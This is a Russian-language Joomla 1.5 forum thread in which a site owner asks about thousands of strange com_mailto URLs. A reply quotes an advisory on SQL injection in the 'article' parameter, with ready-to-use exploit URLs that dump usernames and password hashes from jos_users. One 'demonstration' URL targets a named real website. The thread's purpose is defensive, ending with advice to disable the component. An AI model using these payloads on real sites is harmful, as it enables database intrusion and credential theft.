сайт.ru/component/mailto/?tmpl=component&link=aHR0cD.. wtf? - Joomla 1.5: Общие вопросы

Собственно на сайте заметил недавно тысячи подобных страниц
Может кто-нибудь подсказать что это? Есть подозрение что это спам ссылками по моему сайту. Как это убрать?

Не удивляйтесь, инфа взята с www.xakep.ru

Joomla Component MailTo

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «article» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

/index.php?option=com_mailto&tmpl=mailto&article=[SQL]&Itemid=1
/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+ concat(username,char(58),password)KHG+from+jos_users--&Itemid=1

Демонстрация:

http://www.itp.net/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1= 2+union+select+concat(username,char(58),password)KHG+from+jos_users--&Itemid=1

Спасибо. Можно как-то вообще отключить эту функцию?

Выключить компонент MailTo походу где-то надо.